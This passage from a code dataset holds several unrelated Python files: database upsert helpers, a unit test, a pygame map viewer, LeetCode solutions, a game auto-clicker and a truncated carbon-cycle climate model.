
identifier) = (%s, %s)\n \"\"\", (scale, identifier))\n\n if not location:\n LOG.error(f\"No location for {(scale, identifier)}\")\n return None\n\n LOG.info(f\"Found location {location.id} as {(scale, identifier)}\")\n return location\n\n\ndef upsert_location(db: DatabaseSession,\n scale: str,\n identifier: str,\n hierarchy: str) -> Any:\n \"\"\"\n Upserts a location by its *scale* and *identifier*.\n\n If *hierarchy* is None, it will be set to the location's\n `scale => identifier`. Otherwise, the location's `scale => identifier`\n will be appended to the *hierarchy*.\n\n On update, new hierarchy and existing hierarchy are concatenated, with\n new hierarchy taking precedence if there is overlap of keys.\n \"\"\"\n LOG.debug(f\"Upserting location {(scale, identifier)}\")\n\n # Always includes the new location's own scale => identifier in hierarchy\n location_hierarchy = f\"{scale} => {identifier}\".lower()\n if hierarchy is None:\n hierarchy = location_hierarchy\n else:\n hierarchy = hierarchy + \",\" + location_hierarchy\n\n location = db.fetch_row(\"\"\"\n insert into warehouse.location (scale, identifier, hierarchy)\n values (%s, %s, %s)\n\n on conflict (scale, identifier) do update\n set hierarchy = coalesce(location.hierarchy, '') || excluded.hierarchy\n\n returning location_id as id, scale, identifier, hierarchy\n \"\"\", (scale, identifier, hierarchy))\n\n assert location.id, \"Upsert affected no rows!\"\n\n LOG.info(f\"Upserted location {location.id} as {(location.scale,location.identifier)}\")\n\n return location\n\n\ndef upsert_encounter_location(db: DatabaseSession,\n encounter_id: int,\n relation: str,\n location_id: int) -> Any:\n \"\"\"\n Upserts an encounter location by its *encounter_id* and *relation*.\n \"\"\"\n LOG.debug(f\"Upserting encounter {relation} location\")\n\n with db.cursor() as cursor:\n cursor.execute(\"\"\"\n insert into warehouse.encounter_location (encounter_id, relation, location_id)\n values (%s, %s, %s)\n on conflict 
(encounter_id, relation) do update\n set location_id = excluded.location_id\n \"\"\", (encounter_id, relation, location_id))\n\n assert cursor.rowcount == 1, \"Upsert affected no rows!\"\n\n\ndef upsert_presence_absence(db: DatabaseSession,\n identifier: str,\n sample_id: int,\n target_id: int,\n present: bool,\n details: dict) -> Any:\n \"\"\"\n Upsert presence_absence by its *identifier*.\n\n Confirmed with Samplify that their numeric identifier for each test is stable\n and persistent.\n \"\"\"\n LOG.debug(f\"Upserting presence_absence «{identifier}»\")\n\n data = {\n \"identifier\": identifier,\n \"sample_id\": sample_id,\n \"target_id\": target_id,\n \"present\": present,\n \"details\": Json(details)\n }\n\n presence_absence = db.fetch_row(\"\"\"\n insert into warehouse.presence_absence (\n identifier,\n sample_id,\n target_id,\n present,\n details)\n values (\n %(identifier)s,\n %(sample_id)s,\n %(target_id)s,\n %(present)s,\n %(details)s)\n\n on conflict (identifier) do update\n set sample_id = excluded.sample_id,\n target_id = excluded.target_id,\n present = excluded.present,\n details = coalesce(presence_absence.details, '{}') || excluded.details\n\n returning presence_absence_id as id, identifier\n \"\"\", data)\n\n assert presence_absence.id, \"Upsert affected no rows!\"\n\n LOG.info(f\"Upserted presence_absence {presence_absence.id} \\\n «{presence_absence.identifier}»\")\n\n return presence_absence\n\n\ndef upsert_sample(db: DatabaseSession,\n collection_identifier: str,\n encounter_id: int,\n details: dict) -> Any:\n \"\"\"\n Upsert collected sample by its *collection_identifier*.\n\n The provided *details* are merged (at the top-level only) into\n the existing sample details, if any.\n \"\"\"\n LOG.debug(f\"Upserting sample collection «{collection_identifier}»\")\n\n data = {\n \"collection_identifier\": collection_identifier,\n \"encounter_id\": encounter_id,\n \"details\": Json(details),\n }\n\n sample = db.fetch_row(\"\"\"\n insert into 
warehouse.sample (collection_identifier, encounter_id, details)\n values (%(collection_identifier)s, %(encounter_id)s, %(details)s)\n\n on conflict (collection_identifier) do update\n set encounter_id = excluded.encounter_id,\n details = coalesce(sample.details, '{}') || %(details)s\n\n returning sample_id as id, identifier, collection_identifier, encounter_id\n \"\"\", data)\n\n assert sample.id, \"Upsert affected no rows!\"\n\n LOG.info(f\"Upserted sample {sample.id} with collection identifier «{sample.collection_identifier}»\")\n\n return sample\n\n\ndef find_or_create_target(db: DatabaseSession, identifier: str, control: bool) -> Any:\n \"\"\"\n Select presence_absence test target by *identifier*, or insert it if it doesn't exist.\n \"\"\"\n LOG.debug(f\"Looking up target «{identifier}»\")\n\n target = db.fetch_row(\"\"\"\n select target_id as id, identifier\n from warehouse.target\n where identifier = %s\n \"\"\", (identifier,))\n\n if target:\n LOG.info(f\"Found target {target.id} «{target.identifier}»\")\n else:\n LOG.debug(f\"Target «{identifier}» not found, adding\")\n\n data = {\n \"identifier\": identifier,\n \"control\": control\n }\n\n target = db.fetch_row(\"\"\"\n insert into warehouse.target (identifier, control)\n values (%(identifier)s, %(control)s)\n returning target_id as id, identifier\n \"\"\", data)\n\n LOG.info(f\"Created target {target.id} «{target.identifier}»\")\n\n return target\n\n\nclass SampleNotFoundError(ValueError):\n \"\"\"\n Raised when a function is unable to find an existing sample with the given\n identifier.\n \"\"\"\n pass\n\nclass UnknownSiteError(ValueError):\n \"\"\"\n Raised by :function:`site_identifier` if its provided *site_nickname*\n is not among the set of expected values.\n \"\"\"\n pass\n\nclass UnknownEthnicGroupError(ValueError):\n \"\"\"\n Raised by :function:`hispanic_latino` if its provided *ethnic_group* is not\n among the set of expected values.\n \"\"\"\n pass\n\nclass 
UnknownFluShotResponseError(ValueError):\n \"\"\"\n Raised by :function:`flu_shot` if its provided *flu_shot_reponse* is not\n among the set of expected values.\n \"\"\"\n pass\n\n\nfrom . import *\n","sub_path":"lib/id3c/cli/command/etl/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":14242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"544754059","text":"import pytest\n\nfrom otx.mpa.cls.semisl.stage import SemiSLClsStage\nfrom otx.mpa.cls.stage import ClsStage\nfrom tests.test_suite.e2e_test_system import e2e_pytest_unit\nfrom tests.unit.algorithms.classification.test_helper import setup_mpa_task_parameters\n\n\nclass TestOTXSemiSLClsStage:\n @pytest.fixture(autouse=True)\n def setup(self) -> None:\n self.model_cfg, self.data_cfg, recipie_cfg = setup_mpa_task_parameters(\n task_type=\"semisl\", create_val=True, create_test=True\n )\n self.stage = SemiSLClsStage(name=\"\", mode=\"train\", config=recipie_cfg, common_cfg=None, index=0)\n\n @e2e_pytest_unit\n def test_configure_data(self, mocker):\n mock_ul_dataloader = mocker.patch.object(ClsStage, \"configure_unlabeled_dataloader\")\n fake_semisl_data_cfg = {\"data\": {\"unlabeled\": {\"otx_dataset\": \"foo\"}}}\n self.stage.configure_data(self.stage.cfg, fake_semisl_data_cfg, True)\n\n mock_ul_dataloader.assert_called_once()\n\n @e2e_pytest_unit\n def test_configure_task(self, mocker):\n self.stage.cfg.merge_from_dict(self.model_cfg)\n mock_cfg_classes = mocker.patch.object(ClsStage, \"configure_classes\")\n self.stage.configure_task(self.stage.cfg, True)\n\n assert \"task_adapt\" not in self.stage.cfg.model\n mock_cfg_classes.assert_called_once()\n","sub_path":"tests/unit/mpa/cls/semisl/test_cls_semisl_stage.py","file_name":"test_cls_semisl_stage.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"464795047","text":"import pygame as 
pg\nimport prepare\n\nfrom labels import Label\nfrom line import Line\nfrom state_engine import GameState\n\n\nclass MapViewer(GameState):\n \"\"\"\n This state allows the user to view the map they selected from\n the menu.\n \"\"\"\n def __init__(self):\n super(MapViewer, self).__init__()\n self.screen_rect = prepare.SCREEN.get_rect()\n\n def startup(self, persistent):\n self.persist = persistent\n self.map_name = self.persist[\"map name\"]\n self.map = prepare.GFX[self.map_name.replace(\" \", \"-\")]\n self.rect = self.map.get_rect(center=self.screen_rect.center)\n self.map_scale = prepare.SCALES[self.map_name]\n\n self.lines = []\n self.is_path_end = False\n\n self.font = prepare.FONTS[\"Saniretro\"]\n self.distance_label = None\n self.text_color = (255, 255, 255)\n self.bg_color = (0, 0, 0)\n info = \"Left click to add a point, Right click to end path\"\n self.info_labe = Label(self.font, 20, info,\n self.text_color,\n {\"bottomleft\": self.screen_rect.bottomleft},\n self.bg_color)\n\n def get_event(self, event):\n if event.type == pg.QUIT:\n self.quit = True\n\n if event.type == pg.MOUSEBUTTONUP:\n if event.button == 1: # left click\n if self.lines and self.lines[-1].moving:\n self.set_anchor_point(event.pos)\n else:\n if self.is_path_end:\n self.create_new_path()\n self.create_new_line(event.pos)\n\n if event.button == 3: # right click\n self.end_path(event.pos)\n\n if event.type == pg.MOUSEMOTION:\n if self.lines and self.lines[-1].moving:\n self.lines[-1].end = event.pos\n\n def update(self, dt):\n if self.lines:\n for line in self.lines:\n line.update()\n\n def draw(self, surface):\n surface.fill(pg.Color(\"gray2\"))\n surface.blit(self.map, self.rect)\n if self.lines:\n for line in self.lines:\n line.draw(surface)\n self.distance_label.draw(surface)\n self.info_labe.draw(surface)\n\n def create_new_line(self, pos):\n line = Line(pos)\n self.lines.append(line)\n text = \"{:.2f} miles - {:.2f} kms\".format(0.0, 0.0)\n self.distance_label = Label(self.font, 
20, text,\n self.text_color, {\"topleft\": (0, 0)},\n self.bg_color)\n\n def set_anchor_point(self, pos):\n self.lines[-1].set_end(pos)\n self.distance_label.set_text(self.distance)\n line = Line(pos)\n self.lines.append(line)\n\n def create_new_path(self):\n self.lines = []\n\n def end_path(self, pos):\n self.lines[-1].set_end(pos)\n self.is_path_end = True\n\n @property\n def distance(self):\n distance = 0\n for line in self.lines:\n distance += line.distance * self.map_scale\n kms = distance * 1.60934 # simple conversion\n text = \"{:.2f} miles - {:.2f} kms\".format(distance, kms)\n return text\n","sub_path":"map_viewer.py","file_name":"map_viewer.py","file_ext":"py","file_size_in_byte":3235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"121041902","text":"#\n# @lc app=leetcode.cn id=1380 lang=python3\n#\n# [1380] 矩阵中的幸运数\n#\n\n# @lc code=start\nclass Solution:\n def luckyNumbers(self, matrix: List[List[int]]) -> List[int]:\n # minRow = [min(row) for row in matrix]\n # maxCol = [max(col) for col in zip(*matrix)]\n # ans = []\n # for i, row in enumerate(matrix):\n # for j, x in enumerate(row):\n # if x == minRow[i] == maxCol[j]:\n # ans.append(x)\n # return ans\n ans = []\n for row in matrix:\n for j, x in enumerate(row):\n if max(r[j] for r in matrix) <= x <= min(row):\n ans.append(x)\n return ans\n\n\n# @lc code=end\n\n","sub_path":"1380.矩阵中的幸运数.py","file_name":"1380.矩阵中的幸运数.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"243845730","text":"import logging\n\nfrom kensu.utils.helpers import singleton\n\n\n@singleton\nclass KensuProvider(object):\n default = None # type: Kensu\n\n def instance(self):\n # type: () -> Kensu\n return self.default\n\n def setKensu(self, kensu):\n self.default = kensu\n\n @staticmethod\n def initKensu(api_url=None, auth_token=None, process_name=None, user_name=None, 
code_location=None, init_context=True, do_report=True, report_to_file=False, offline_file_name=None, reporter=None, **kwargs):\n if KensuProvider().instance() is None:\n from kensu.utils.kensu import Kensu\n pandas_support = kwargs[\"pandas_support\"] if \"pandas_support\" in kwargs else True\n sklearn_support = kwargs[\"sklearn_support\"] if \"sklearn_support\" in kwargs else True\n bigquery_support = kwargs[\"bigquery_support\"] if \"bigquery_support\" in kwargs else False\n tensorflow_support = kwargs[\"tensorflow_support\"] if \"tensorflow_support\" in kwargs else False\n\n project_names = kwargs[\"project_names\"] if \"project_names\" in kwargs else []\n environment = kwargs[\"environment\"] if \"environment\" in kwargs else None\n timestamp = kwargs[\"timestamp\"] if \"timestamp\" in kwargs else None\n logical_naming = kwargs[\"logical_naming\"] if \"logical_naming\" in kwargs else None\n mapping = kwargs[\"mapping\"] if \"mapping\" in kwargs else True\n report_in_mem = kwargs[\"report_in_mem\"] if \"report_in_mem\" in kwargs else False\n\n _kensu = Kensu(api_url=api_url, auth_token=auth_token, process_name=process_name, user_name=user_name,\n code_location=code_location, init_context=init_context, do_report=do_report, pandas_support = pandas_support,\n sklearn_support = sklearn_support, bigquery_support = bigquery_support, tensorflow_support = tensorflow_support, \n project_names=project_names,environment=environment,timestamp=timestamp,logical_naming=logical_naming,mapping=mapping, report_in_mem = report_in_mem,\n report_to_file=report_to_file, offline_file_name=offline_file_name, reporter=reporter)\n\n KensuProvider().setKensu(_kensu)\n return _kensu\n else:\n logging.error(\"Kensu default is already set kensu={}\" % KensuProvider.instance())\n","sub_path":"kensu/utils/kensu_provider.py","file_name":"kensu_provider.py","file_ext":"py","file_size_in_byte":2358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} 
+{"seq_id":"451039759","text":"import win32api\nimport win32gui\nimport win32con\nimport time\n\n\nclass WangzherongyaoGame:\n\n def __init__(self):\n self.hwnd = win32gui.FindWindow(win32con.NULL, '腾讯手游助手【极速傲引擎】')\n self.left, self.top, self.right, self.bottom = win32gui.GetWindowRect(self.hwnd)\n self.sonHwnd = win32gui.FindWindowEx(self.hwnd, 0, \"AEngineRenderWindowClass\", None)\n self.sonLeft, self.sonTop, self.sonRight, self.sonBottom = win32gui.GetWindowRect(self.sonHwnd)\n self.offsetTop = self.sonTop - self.top\n self.offsetLeft = self.sonLeft - self.left\n self.width = self.sonRight - self.sonLeft\n self.height = self.sonBottom - self.sonTop\n\n def show(self):\n win32gui.ShowWindow(self.hwnd, win32con.SW_RESTORE)\n win32gui.SetForegroundWindow(self.hwnd)\n\n def getPixelColor(self, xy):\n color = win32gui.GetPixel(win32gui.GetWindowDC(self.hwnd), xy[0] + self.offsetLeft, xy[1] + self.offsetTop)\n return color % 256, color // 256 % 256, color // 256 // 256\n\n def click(self, xy):\n long_position = win32api.MAKELONG(xy[0], xy[1])\n print(win32api.SendMessage(self.hwnd, win32con.WM_LBUTTONDOWN, win32con.MK_LBUTTON, long_position))\n win32api.SendMessage(self.hwnd, win32con.WM_LBUTTONUP, win32con.MK_LBUTTON, long_position)\n\n\nif __name__ == '__main__':\n\n xys = [(100, 100),(200, 200),(300, 300),(400, 400),(805, 530), (805, 540), (805, 550), (805, 560), (805, 527), (805, 485), (774, 400), (1000, 87)]\n autoBtnXy = (957, 22)\n autoBtnColor = (175, 192, 201)\n\n game = WangzherongyaoGame()\n game.show()\n print(game.getPixelColor(autoBtnXy))\n\n while True:\n if game.getPixelColor(autoBtnXy) == autoBtnColor:\n print(456)\n game.click(autoBtnXy)\n for xy in xys:\n print(xy)\n game.click(xy)\n time.sleep(0.3)\n","sub_path":"wangzherongyao.py","file_name":"wangzherongyao.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"595498524","text":"'''\nYou are given a 
binary string binary consisting of only 0's or 1's. You can apply each of the following operations any number of times:\n\nOperation 1: If the number contains the substring \"00\", you can replace it with \"10\".\nFor example, \"00010\" -> \"10010\"\nOperation 2: If the number contains the substring \"10\", you can replace it with \"01\".\nFor example, \"00010\" -> \"00001\"\nReturn the maximum binary string you can obtain after any number of operations. \nBinary string x is greater than binary string y if x's decimal representation is greater than y's decimal representation.\n'''\nclass Solution:\n\tdef maxString(self, binary:str)->str:\n\t\tif '0' not in binary:\n\t\t\treturn binary\n\t\tk, n = binary.count('1', binary.find('0')), len(binary)\n\t\treturn '1'*(n - k - 1) + '0' + '1'*k \nif __name__ == \"__main__\":\n\ts = \"000110\"\n\to = Solution()\n\tprint(o.maxString(s))\n\t\t\n\t\t\t","sub_path":"questions/1702. Maximum Binary String After Change/max.py","file_name":"max.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"390835362","text":"###############################################################################\r\n# 7/9/18\r\n# \r\n# This file contains all of the functions necessary to simulate pCO2 in the \r\n# atmosphere of a planet with liquid water at the surface. The model is written\r\n# using the equations of \"Constraining the climate and ocean pH of the early\r\n# Earth with a geological carbon cycle model\" by Krissansen-Totten et al. \r\n# (2018). 
Unless otherwise noted, all equation references in this code refer \r\n# to the equations of that paper, which is abbreviated as JKT in this code.\r\n#\r\n# This code was written by Owen Lehmer, questions can be addressed to:\r\n# info@lehmer.us\r\n# \r\n# RUNNING THE MODEL\r\n# Steps: TBD\r\n###############################################################################\r\n\r\nfrom math import exp, log, log10\r\nfrom scipy.optimize import fsolve\r\nfrom pynamic import pynamic_ode\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nDEBUG = True #show some extra plots and prints during running when True\r\n\r\n\r\nclass ModelInputs:\r\n \"\"\"\r\n This class represents the structure for changing model parameters. The\r\n default parameters will be for the modern Earth. The values were taken from\r\n the mean values of the parameter ranges given in Table S1 and Table S2 of\r\n JKT. To change the parameters create a new ModelInputs object (see demo\r\n file) and pass it to runWeatheringModelPore().\r\n \"\"\"\r\n def __init__(self):\r\n self.Mo = 1.35E21 #ocean mass [kg]\r\n self.Mp = 1.35E19 #pore space mass [kg]\r\n self.W = 2.0E5 #ocean mixing time [yr]\r\n self.J = self.Mo/self.W #mixing rate of the ocean [kg yr-1]\r\n self.f_bio = 1.0 #biological weathering fraction \r\n self.f_land = 1.0 #land fraction compared to modern Earth\r\n self.oceanpH = 8.2 #pH of modern ocean\r\n self.Hmod_mol = 10.0**(-self.oceanpH) #equation S16, initial H conc.\r\n self.pCO2 = 0.000280 #pCO2 on modern Earth [bar]\r\n self.CO2_alpha = 0.3 #alpha term in equation 1\r\n self.CO2_eps = 0.3 #epsilon term in equation S2\r\n self.Te = 25.0 #e-folding temp in equations 1, S2 [K]\r\n self.Fmod_out = 6.0E12 #modern outgassing rate [mol C yr-1]\r\n self.Fmod_carb = 10.0E12 #modern carbonate weathering rate [mol C yr-1]\r\n self.carb_n = 1.75 #carbonate precipitation coefficient \r\n self.diss_x = 1.0 #modern seafloor dissolution relative to prec.\r\n self.grad = 1.075 #temperature 
gradient from surface to ocean depth\r\n self.gamma = 0.2 #pH dependence of seafloor weathering\r\n self.E_bas = 90000.0 #temp dependence of seafloor weathering [J mol-1]\r\n self.beta = 0.1 #spreading rate dependence\r\n self.out_m = 1.5 #outgassing exponent\r\n self.sed_depth = 700.0 #sediment thickness [m] \r\n self.Pmod_pore = 0.45E12 #modern pore space precipitation [mol C yr-1]\r\n self.Fmod_diss = 0.45E12 #modern seafloor dissolution rate [mol C yr-1]\r\n self.Ts_mod = 285.0 #modern (preindustrial) surface temp [K]\r\n self.ca = 0.01 #modern Ca abundance [mol kg-1]\r\n self.s = 1.8E20/self.Mo #correction factor for mass balance\r\n #the 1.8E20 is the mass of the atmosphere\r\n self.Q = 1.0 #internal heat flow compared to modern\r\n self.K = 77.8 #conductivity of the sediments [m K-1]\r\n self.lum = 1.0 #the luminosity compared to the modern Earth\r\n \r\n def setW(self,W):\r\n self.J = self.Mo/W\r\n self.W = W\r\n\r\n def print(self):\r\n for key, val in self.__dict__.items():\r\n print(\"%s = %2.3e\"%(key, val))\r\n\r\n\r\ndef runWeatheringModelPore(inputs=ModelInputs(), guess=None, chem_tol=1.0E-5, \r\n chem_max_iter=10, timestep=1000.0):\r\n \"\"\"\r\n This is the top level function to run the model. The model inputs can be\r\n changed by creating an instance of the ModelInputs() class then changing\r\n the values as desired, i.e.:\r\n my_inputs = ModelInputs()\r\n my_inputs.oceanpH = 7.0\r\n\r\n To run the model for the modern Earth simply call runWeatheringModelPore() with\r\n no parameters. \r\n\r\n The model can be run with a fast numerical solver (scipy.optimize.fsolve)\r\n or via manual integration (very slow). If the model is not converging try\r\n running the manual mode.\r\n\r\n Inputs:\r\n inputs - the model inputs parameters, default to the modern Earth\r\n guess - a guess for the alkalinity and carbon concentrations in\r\n the system. 
The guess must be an array of the form:\r\n [Co,Ao,Cp,Ap]\r\n chem_tol - the tolerance (% difference between runs) that will be \r\n used with the carbon chemistry\r\n chem_max_iter - the maximum number of iterations allowed during \r\n chemistry calculations\r\n timestep - the max timestep in [yr] to use in during integration\r\n\r\n Returns:\r\n [pCO2, pH, Ts] - array of values where the values are:\r\n pCO2 - the atmospheric CO2 partial pressure [bar]\r\n pH - the ocean pH\r\n Ts - the surface temperature [K]\r\n times - the time values that the model was run at\r\n y_vals - an array with the results of the model in the form:\r\n [Co, Ao, Cp, Ap] where Co is the ocean dissolved inorganic\r\n carbon concentration, Cp is the same but for the pore space,\r\n Ao is the alkalinity in the ocean, and Ap is the alkalinity of\r\n the pore space.\r\n status - the status of the model run, 1 means everything went well\r\n \"\"\"\r\n\r\n #calculate all the parameters needed\r\n F_out = globalOutgassing(inputs.Fmod_out, inputs.Q, inputs.out_m)\r\n\r\n #[K_diss, K_ocean, K_pore, Fmod_sil, alk0_o, alk0_p, Co0, Cp0, Ao0, Ap0] = \\\r\n [K_diss, K_ocean, K_pore, Fmod_sil, Co0, Cp0, Ao0, Ap0] = \\\r\n initialParameters(inputs)\r\n\r\n# K_diss = 3.066e43\r\n# K_ocean = 8.413e12\r\n# K_pore = 1.346e11\r\n# Co0 = 1.604e-3\r\n\r\n\r\n if guess is not None:\r\n #was given a guess\r\n [Co0, Cp0, Ao0, Ap0] = guess\r\n\r\n deltaTs = 0.0 #just initially\r\n\r\n #parameters we want to record, initialize them here\r\n pCO2 = inputs.pCO2\r\n pH = inputs.oceanpH\r\n Ts = 0.0 #just initialize the variable here\r\n\r\n def calculateModelDerivatives(_, params):\r\n \"\"\"\r\n The equation that will be passed to fsolve. 
Fsolve will take initial\r\n guesses for Co, Cp, Ao, and Ap, then iterate on each variable until\r\n it satisfies the equations in carbonAndAlkalinityEquations() (when all\r\n the derivatives are zero, which implies it's in steady state).\r\n \"\"\"\r\n \r\n #if you're not familiar with the nonlocal keyword, it is saying this \r\n #pCO2, pH, and Ts are the same as the ones declared outside this scope \r\n #(so above this func).\r\n nonlocal pCO2, pH, Ts\r\n\r\n [Co, Ao, Cp, Ap] = params\r\n\r\n #correct the ocean DIC for mass balance\r\n DIC = Co - inputs.s*pCO2\r\n \r\n Ts_old = 0.0\r\n num = 0\r\n diff = 1.0\r\n omega_o, omega_p = 0.0, 0.0\r\n T_pore = 0.0\r\n while diff > chem_tol and num < chem_max_iter:\r\n \"\"\"\r\n Solve for the equilibrium carbon chemistry. The solution is \r\n temperature dependent, so we'll iterate the process until the \r\n temperature and chemistry become steady (measured by the % change\r\n in Ts between runs).\r\n \"\"\"\r\n Ts = surfaceTempFromPureCO2ClimateModel(pCO2, inputs.lum) \r\n T_do = deepOceanTemperature(Ts, inputs.grad)\r\n T_pore = poreSpaceTemperature(T_do, inputs.Q, inputs.sed_depth, \r\n inputs.K)\r\n omega_o, pCO2, pH = equilibriumChemistry(Ts, Ao, DIC, inputs.s, \r\n Ao0, inputs.ca)\r\n omega_p = equilibriumChemistry(T_pore, Ap, Cp, 0, \r\n Ap0, inputs.ca)[0]\r\n diff = np.abs(Ts-Ts_old)/Ts #(pCO2 - pCO2_old)/pCO2\r\n num += 1\r\n Ts_old = Ts #pCO2_old = pCO2\r\n\r\n #calculate the terms needed\r\n P_ocean = 0\r\n P_pore = 0\r\n #only precipitate when omega > 1\r\n if omega_o > 1:\r\n P_ocean = K_ocean*inputs.f_land*(omega_o - 1.0)**inputs.carb_n #S19\r\n if omega_p > 1:\r\n P_pore = K_pore*(omega_p - 1.0)**inputs.carb_n #S19\r\n\r\n F_carb = continentalCarbonateWeathering(inputs.f_bio, inputs.f_land, \r\n inputs.Fmod_carb, pCO2, inputs.pCO2, inputs.CO2_eps, \r\n deltaTs, inputs.Te)\r\n\r\n F_sil = continentalSilicateWeahtering(inputs.f_bio, inputs.f_land, \r\n Fmod_sil, pCO2, inputs.pCO2, inputs.CO2_alpha, deltaTs, 
\r\n inputs.Te)\r\n\r\n H_mol = 10.0**(-pH) #equation S16, pH definition\r\n r_sr = spreadingRate(inputs.Q, inputs.beta)\r\n F_diss = seafloorBasaltDissolution(K_diss, r_sr, inputs.E_bas, \r\n T_pore, H_mol, inputs.Hmod_mol, inputs.gamma)\r\n\r\n #correct for mass balance in the ocean\r\n #print(\"Po=%2.3e, Pp=%2.3e, Fo=%2.3e, Fc=%2.3e, Fs=%2.3e, Fd=%2.3e\"%(P_ocean,P_pore, F_out, F_carb, F_sil, F_diss))\r\n\r\n derivatives = carbonAndAlkalinityEquations(\r\n inputs.Mo, inputs.Mp, inputs.J, Co, Cp, F_out, \r\n F_carb, P_ocean, Ao, Ap, \r\n F_sil, F_diss, P_pore)\r\n\r\n return derivatives #derivatives = [dtCo, dtAo, dtCp, dtAp]\r\n\r\n #prepare the model inputs\r\n start_time = 0\r\n max_time = 10E9 #we're using years, so 10 Byr max time to equilibrate\r\n initial_val = [Co0, Cp0, Ao0, Ap0]\r\n param_to_monitor = 0 #monitor carbon content in the ocean\r\n max_param_delta = 0.01 #1% change at most\r\n base_time_step = timestep #start at 1,000 years\r\n min_step_time = 0.1\r\n def end_condition(time, time_step, vals, vals_old):\r\n status = 0\r\n if time > 10E5:\r\n #make sure nothing weird happens with the initial conditions\r\n\r\n #check if the derivative is almost 0\r\n if abs((vals[0] - vals_old[0])/vals[0]) < 1.0E-6:\r\n #less than a 1.0E-6 relative change, \r\n #return a positive status value to end\r\n status = 1\r\n return status\r\n\r\n times, y_vals, status = pynamic_ode(calculateModelDerivatives, \r\n start_time, max_time, initial_val, param_to_monitor, \r\n max_param_delta, base_time_step, min_step_time, end_condition, \r\n use_rk4=True)\r\n\r\n if DEBUG:\r\n print(\"Solver had status: %d\"%(status))\r\n\r\n y_vals = np.array(y_vals)\r\n Co_arr = y_vals[:, 0]\r\n Cp_arr = y_vals[:, 1]\r\n Ao_arr = y_vals[:, 2]\r\n Ap_arr = y_vals[:, 3]\r\n\r\n plt.plot(times, Co_arr, label=\"Co\")\r\n plt.plot(times, Cp_arr, label=\"Cp\")\r\n plt.plot(times, Ao_arr, label=\"Ao\")\r\n plt.plot(times, Ap_arr, label=\"Ap\")\r\n plt.legend()\r\n plt.xlabel(\"Time [yr]\")\r\n 
plt.show()\r\n\r\n\r\n y_vals[-1][0] += inputs.s*pCO2 #correct for mass balance in Co for the last step\r\n \r\n #y_vals in an array of arrays with the form: [Co, Cp, Ao, Ap]\r\n return [pCO2, pH, Ts], times, y_vals, status\r\n\r\n\r\ndef initialParameters(inputs):\r\n \"\"\"\r\n Several parameters need to be initialized. Here we use the (assumed) values\r\n for modern seafloor carbonate precipitation, outgassing, and the ratio of\r\n seafloor dissolution to carbonate precipitation to calculate the rate \r\n constants needing by the model.\r\n \"\"\"\r\n Ts = 288 #surfaceTempFromPureCO2ClimateModel(inputs.pCO2, inputs.lum)\r\n T_do = deepOceanTemperature(Ts, inputs.grad)\r\n T_pore = poreSpaceTemperature(T_do, inputs.Q, inputs.sed_depth, inputs.K)\r\n\r\n [K1, K2, H_CO2] = equilibriumRateConstants(Ts)\r\n\r\n partition = inputs.Fmod_diss/inputs.Fmod_out\r\n Fmod_diss = partition*inputs.Fmod_out*inputs.diss_x\r\n Fmod_sil = (1.0 - partition)*inputs.Fmod_out + \\\r\n (1 - inputs.diss_x)*partition*inputs.Fmod_out\r\n Pmod_pore = partition*inputs.Fmod_out\r\n\r\n #initial conditions for atmosphere-ocean system (eqns S12 to S14)\r\n CO2aq_o = H_CO2*inputs.pCO2\r\n HCO3_o = K1*CO2aq_o/(10**-inputs.oceanpH)\r\n CO3_o = K2*HCO3_o/(10**-inputs.oceanpH)\r\n DIC_o = CO3_o + HCO3_o + CO2aq_o #total dissolved inorganic carbon\r\n ALK_o = 2.0*CO3_o + HCO3_o #carbonate alkalinity\r\n\r\n DIC_p = DIC_o - Pmod_pore/inputs.J\r\n b1 = 2.0*Fmod_diss + inputs.J*ALK_o - 2.0*inputs.J*DIC_o\r\n ALK_p = (b1 + 2.0*inputs.J*DIC_p)/inputs.J\r\n\r\n Pmod_ocean = inputs.Fmod_out + inputs.Fmod_carb -(DIC_o - DIC_p)*inputs.J\r\n\r\n omega_p, _, pH_p = equilibriumChemistry(T_pore, ALK_p, DIC_p, 0, \r\n ALK_p, inputs.ca)\r\n\r\n omega_o = inputs.ca*CO3_o/carbonateSolubility(T_do)\r\n\r\n K_pore = Pmod_pore/(omega_p - 1.0)**inputs.carb_n #for pore precip.\r\n K_ocean = Pmod_ocean/(omega_o - 1.0)**inputs.carb_n #for ocean precip.\r\n\r\n K_diss = Fmod_diss/(2.88*10**-14*10**(-inputs.gamma*pH_p)*\r\n 
exp(-inputs.E_bas/(8.314*T_pore)))\r\n\r\n Co = DIC_o + inputs.pCO2*inputs.s\r\n Cp = DIC_p\r\n Ao = ALK_o\r\n Ap = ALK_p\r\n\r\n return [K_diss, K_ocean, K_pore, Fmod_sil, Co, Cp, Ao, Ap]\r\n\r\n\r\ndef carbonAndAlkalinityEquations(Mo, Mp, J, Co, Cp, F_out, F_carb, P_ocean,\r\n Ao, Ap, F_sil, F_diss, P_pore):\r\n \"\"\"\r\n This function calculates the concentrations of carbon in the ocean-\r\n atmosphere system as well as the pore space. It will also solve for the\r\n alkalinity of the ocean and the pore space. This functions corresponds to \r\n equation S1. This is the top-level function that represents the model \r\n described by Krissansen-Totten et al. (2018).\r\n\r\n Inputs:\r\n Mo - mass of the ocean [kg]\r\n Mp - mass of the pore space [kg]\r\n J - constant mixing flux [kg s-1]\r\n Co - carbon concentration in atmosphere-ocean [Tmol C kg-1]\r\n Cp - carbon concentration in the pore space [Tmol C kg-1]\r\n F_out - global outgassing flux [Tmol C yr-1]\r\n F_carb - continental carbonate weathering rate [Tmol C yr-1]\r\n P_ocean - precipitation flux of carbonates in the ocean [Tmol C yr-1]\r\n Ao - carbonate alkalinity 